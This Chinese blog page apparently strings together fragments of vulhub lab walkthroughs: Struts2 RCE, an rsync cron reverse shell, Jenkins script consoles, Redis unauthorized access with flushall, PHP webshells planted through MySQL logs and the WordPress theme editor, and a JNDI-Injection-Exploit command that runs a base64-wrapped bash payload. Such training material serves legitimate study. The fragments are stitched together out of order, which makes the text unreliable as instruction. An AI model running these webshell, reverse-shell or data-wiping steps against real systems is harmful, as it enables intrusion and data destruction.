weixin_57240513的博客

1、客户端：准备一个内网的linux内网主机，或是一个虚拟机。2、服务端：准备一个云服务器（阿里、腾讯、华为都行）。

Spring是Java EE编程领域的一个轻量级开源框架，该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建，是为了解决企业级编程开发中的复杂性，业务逻辑层和其他各层的松耦合问题，因此它将面向接口的编程思想贯穿整个系统应用，实现敏捷开发的应用型框架。框架的主要优势之一就是其分层架构，分层架构允许使用者选择使用哪一个组件，同时为J2EE应用程序开发提供集成的框架。

漏洞产生于网站配置XML时如果没有设置namespace的值，并且上层动作配置中并没有设置或使用通配符namespace时，可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值，并且上层动作并没有设置或使用通配符namespace，从而导致远程代码执行漏洞的发生。

docker-compose ps//查看开启的端口。

查看一下文件里面的内容，里面的大概意思就是每17分钟调用一次/etc/cron.hourly。nmap -p 873 --script rsync-list-modules 加IP地址。随便往里面写一个文件测试一下，例如phpinfo.php,如下命令在kali创建一个文件。等待17分钟后，查看监听到的信息，代表连接成功。将文件再上传到受害者，也就是靶场环境里。在kali机子上拉取一个shell文件。查看src目录里面的信息。查看到是有漏洞的模块的。将文件下载下到kali。将shell文件提权。

默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令，攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务，通过脚本执行界面从而获取服务器权限。

sc create "Memcached11211" binPath= "D:\网络安全培训\上课实验包\memcached-1.4.5-amd64\memcached-amd64\memcached.exe -d runservice -p 11211" DisplayName= "Memcached11211" start= auto。下载完成，用管理员身份打开cmd窗口。执行命令安装，注意地址替换为自己的。开启服务，注意地址替换为自己的。

拉取mongo(3.6.6版本)镜像启动镜像查看镜像docker ps。

看所有键:KEYS *，使用select num可以查看键值数据。redis-cli -h 192.168.4.176-p 6379#redis常见命令。(7)config get dir/dbfilename 获取路径及数据配置信息。进入目录:cd /vulhub-master/redis/4-unacc。启动:docker-compose up -d。(2)删除所有数据库内容:flushall。检查:docker-compose ps。(9)get 变量，查看变量名称。(1)查看信息:info。

ASPCMS是由上⾕⽹络开发的全新内核的开源企业建站系统，能够胜任企业多种建站需求，并且⽀持模版⾃定义、⽀持扩展插件等等，能够在短时间内完成 企业建站。

首页如下。

路径：C:\phpStudy\MySQL\data\。猜测web路径：C:\phpStudy\www。使用中国菜刀工具连接自己创建的php文件。设置日志文件目录，创建php日志文件。不要⽤\,如⾥要⽤\\（转义）懒人方法：也可以直接全部运行。1.⾸先判断mysql位置。往日志文件里写一句话木马。查看自己创建的日志文件。3.写webshell。链接到了服务器的目录。

将靶场环境放到www目录下——访问/dedecms/uploads同意协议——继续继续配置后——点击继续进入后台登录后台——填写用户名密码。

执行命令 cd /vulhub/wordpress/pwnscriptumdocker-compose up -d。连接成功，进入了靶场的目录(我是kali搭建的靶场)打开wordpress关卡，选择简体中文——继续。添加信息——点击安装WordPress。插入一句话木马 ——更新文件。点击外观——编辑主题。

java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,[经过base64编码后的命令1}|{base64,-d}|bash"-A 你的ypsipl。访问一下：/solr/admin/cores?第一步：先在dns平台上，点击Get SubDomain ，监控我们的注入效果。kali里面就可以监听的到了。

ITOver Permission越权漏洞，，，里面有用户名和密码，，后面要用。。

使用kali扫描网关的主机。扫到一个开放了80端口HTTP协议的主机ip。

我是使用kali虚拟机搭建的靶场，具体搭建步骤可以看我之前的博客内容。

查看一下docker-compose的版本信息，查看一下docker-compose有没有下载成功。例如我的是192.168.189.150:8080访问成功，请开始您的操作。进入vulhub后，使用ls命令列出vulhub下的文件也就是靶场关卡。继续ls列出该靶场关卡下的关卡漏洞编号。也可以直接在vulhub文件夹中右键打开终端。先查看一下docker有没有下载成功。再查看一下docker的运行状态。如下图是我开启后的端口。

查询漏洞的语句icon_hash="-1830859634"